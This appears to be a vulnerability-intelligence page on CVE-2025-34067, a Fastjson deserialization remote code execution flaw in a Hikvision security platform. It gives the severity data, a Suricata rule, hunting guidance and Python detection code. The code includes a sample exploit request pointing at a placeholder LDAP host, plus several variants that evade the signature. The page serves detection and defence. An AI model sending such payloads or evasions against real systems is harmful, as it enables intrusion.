CVE-2025-34067
Published: 2025-07-02
Priority: P1 · 89 · critical · 10 · CVSS 4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
ITW: VulnCheck KEV (exploited in the wild)
EPSS: 18.67% (96.9th percentile)
An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-05 UTC.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hikvision | integrated_security_management_platform | — | — |
Detection & IOCs (extracted from sources)
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Hikvision applyCT datasourcename Parameter Command Injection Attempt (CVE-2025-34067)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:26; content:"/bic/ssoService/v1/applyCT"; fast_pattern; http.request_body; content:"|22|datasourcename|22|"; content:"|22|ldap|3a 2f 2f|"; within:15; reference:url,www.sentinelone.com/vulnerability-database/cve-2025-34067/; reference:cve,2025-34067; classtype:attempted-admin; sid:2068368; rev:1; metadata:affected_product HikVision, attack_target Networking_Equipment, tls_state plaintext, created_at 2026_03_20, cve CVE_2025_34067, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2026_03_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|22|datasourcename|22| followed by |22|ldap|3a 2f 2f| within:15
- Look for HTTP POST requests to the exact URI /bic/ssoService/v1/applyCT (the rule pins the URI to exactly 26 bytes); this is the vulnerable deserialization endpoint.
- Inspect POST request bodies for the JSON key "datasourcename" followed, within 15 bytes, by a string value beginning ldap://; this is the Fastjson auto-type payload pattern used to make the server load a class from an attacker-controlled LDAP server.
- Exploitation was observed in the wild as early as 2025-02-05 UTC; treat hits on this signature as high-confidence exploitation attempts rather than generic scanning, and confirm success by looking for the outbound LDAP connection described below.
- Scanning/exploitation attempts against CVE-2025-34067 have been attributed to Iran-nexus threat actors using commercial VPN exit nodes (Mullvad, ProtonVPN, Surfshark, NordVPN) and VPS infrastructure; correlate source IPs against those VPN egress ranges.
- Monitor Hikvision Integrated Security Management Platform hosts for unexpected outbound LDAP connections: a successful exploit makes the server connect to the attacker-controlled LDAP URL to fetch the malicious Java class, so an outbound connection shortly after a matching POST is the strongest indicator that the attempt succeeded.
- The Snort/Suricata rule SID 2068368 (ET, rev:1, created 2026-03-20) detects this exploit pattern directly and should be deployed on both perimeter and internal sensors.
- Caveat: the rule only fires on plaintext (non-TLS) HTTP; if the platform sits behind TLS termination or a reverse proxy, the rule will not trigger and inspection at the TLS termination point is needed.
- Caveat: the URI match uses an exact byte-size constraint (bsize:26) and the content matches are case-sensitive (no nocase), so URL encoding of the path, a path prefix added by a proxy, or a differently cased key would not match this specific signature.
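To exercise the matching logic above against traffic samples, the following Python is an added example written for this page; it is not the rule author's code and not part of the Hikvision platform. It re-implements the SID 2068368 conditions (POST, 26-byte URI, the key followed by "ldap:// ending within 15 bytes), adds a relaxed matcher for deployments behind a path-rewriting proxy, and scans Zeek-style conn.log lines for outbound connections from the platform host. Every request, address (203.0.113.5, 10.0.5.20) and log line is constructed for the example; the relaxed matcher's case-insensitive key lookup is an assumption about what the deserializer tolerates, not something the page states.

```python
# Added example for this page: re-implementation of ET SID 2068368's match
# conditions plus a relaxed matcher and an outbound-connection check.
# Not the rule author's code; all requests, hosts and log lines are constructed.
from urllib.parse import unquote, urlsplit

VULN_URI = "/bic/ssoService/v1/applyCT"   # 26 bytes, hence bsize:26 in the rule
KEY = b'"datasourcename"'                  # content:"|22|datasourcename|22|"
LDAP = b'"ldap://'                         # content:"|22|ldap|3a 2f 2f|"
WITHIN = 15                                # LDAP must end within 15 bytes of KEY's end


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, uri, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    method, uri, _version = head.split(b"\r\n", 1)[0].split(b" ", 2)
    return method.decode(), uri.decode(), body


def strict_match(raw: bytes) -> bool:
    """Mirror of SID 2068368. Content matches are case-sensitive because the
    rule carries no 'nocase'; 'within' follows Snort/Suricata semantics
    (the second content must end within WITHIN bytes of the first's end)."""
    method, uri, body = parse_request(raw)
    if method != "POST" or len(uri) != 26 or uri != VULN_URI:
        return False
    i = body.find(KEY)
    if i < 0:
        return False
    end = i + len(KEY)
    return LDAP in body[end:end + WITHIN]


def relaxed_match(raw: bytes) -> bool:
    """Looser check for hosts behind a proxy: percent-decode the path, accept a
    path prefix, match the key case-insensitively (assumption, see lead-in)
    and accept the LDAP URL anywhere in the body. Expect more false positives."""
    method, uri, body = parse_request(raw)
    path = unquote(urlsplit(uri).path)
    if method != "POST" or not path.endswith(VULN_URI):
        return False
    low = body.lower()
    return KEY in low and b"ldap://" in low


def outbound_from_platform(conn_log: str, platform_hosts, allowed_dsts):
    """Scan Zeek conn.log lines (ts uid id.orig_h id.orig_p id.resp_h id.resp_p
    proto service ...) for connections from an ISMP host to any destination
    outside the allow list. Port-agnostic on purpose: the attacker picks the
    LDAP port. Returns (src, dst, dport) tuples."""
    hits = []
    for line in conn_log.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split("\t")
        src, dst, dport = f[2], f[4], int(f[5])
        if src in platform_hosts and dst not in allowed_dsts:
            hits.append((src, dst, dport))
    return hits


# Constructed samples. 203.0.113.5 is a documentation-range placeholder.
EXPLOIT = (b"POST /bic/ssoService/v1/applyCT HTTP/1.1\r\nHost: ismp.example\r\n"
           b"Content-Type: application/json\r\n\r\n"
           b'{"datasourcename":"ldap://203.0.113.5:1389/a"}')
PREFIXED = EXPLOIT.replace(b"POST /bic", b"POST /ismp/bic")        # proxy prefix
ENCODED = EXPLOIT.replace(b"applyCT", b"apply%43T")                 # URL-encoded C
CAMEL = EXPLOIT.replace(b'"datasourcename"', b'"dataSourceName"')   # key casing
SPACED = EXPLOIT.replace(b'":"ldap', b'":' + b" " * 16 + b'"ldap')  # past within:15
BENIGN = (b"POST /bic/ssoService/v1/applyCT HTTP/1.1\r\nHost: ismp.example\r\n\r\n"
          b'{"username":"svc","token":"abc"}')

# Constructed Zeek conn.log; timestamps fall on 2025-02-05 UTC.
CONN_LOG = (
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\n"
    "1738713600.10\tC1\t10.0.5.20\t51234\t203.0.113.5\t1389\ttcp\t-\n"
    "1738713601.40\tC2\t10.0.5.20\t51235\t10.0.5.2\t53\tudp\tdns\n"
    "1738713602.00\tC3\t10.0.9.9\t40000\t203.0.113.5\t1389\ttcp\t-\n"
)


def demo():
    """Return ({sample: (strict, relaxed)}, outbound hits) for the samples."""
    samples = {"exploit": EXPLOIT, "prefixed": PREFIXED, "encoded": ENCODED,
               "camel": CAMEL, "spaced": SPACED, "benign": BENIGN}
    results = {k: (strict_match(v), relaxed_match(v)) for k, v in samples.items()}
    outbound = outbound_from_platform(CONN_LOG, {"10.0.5.20"}, {"10.0.5.2"})
    return results, outbound


if __name__ == "__main__":
    res, out = demo()
    for name, (s, r) in res.items():
        print(f"{name:9s} strict={s!s:5s} relaxed={r}")
    print("outbound from platform:", out)
```

Only the unmodified exploit sample fires the strict matcher; the prefixed, URL-encoded, re-cased and whitespace-padded variants all slip past it while the relaxed matcher still flags them, which is the trade-off to weigh when the platform sits behind a proxy. The conn.log scan deliberately ignores the destination port, since an attacker-run LDAP server can listen anywhere.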
CVSS provenance
nvd · v4.0 · 10.0 CRITICAL · CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck · 10.0 CRITICAL
GHSA
GHSA-ch97-xgvh-p6mh · ghsa_unreviewed · 2025-07-02
CVE-2025-34067 [CRITICAL] CWE-502 (Deserialization of Untrusted Data)
Advisory text: the same description as at the top of this page, without the Shadowserver sentence.
VulnCheck
vulncheck · 2025 · CVSS 10.0
CVE-2025-34067 [CRITICAL] Deserialization of Untrusted Data
Advisory text: as in the description at the top of this page.
Affected: Hikvision Integrated Security Management Platform
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remed
Suricata
suricata · 2026-03-20 · CVSS 10.0
CVE-2025-34067 [CRITICAL] ET WEB_SPECIFIC_APPS Hikvision applyCT datasourcename Parameter Command Injection Attempt (CVE-2025-34067)
Rule: SID 2068368, rev 1; full rule text quoted under Detection & IOCs above.
No public exploits indexed.
Tenable
blogs_tenable · 2026-03-11
Iranian-linked actors are engaging in disruptive attacks
Checkpoint
blogs_checkpoint · 2026-03-04 · also tagged CVE-2017-7921
Interplay between Iranian Targeting of IP Cameras and Physical Warfare in the Middle East
Key Findings
During the ongoing conflict, we identified intensified targeting of IP cameras f
References
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
- https://s4e.io/tools/hikvision-applyct-remote-code-execution
- https://vulncheck.com/advisories/hikvision-ismp-rce-applyct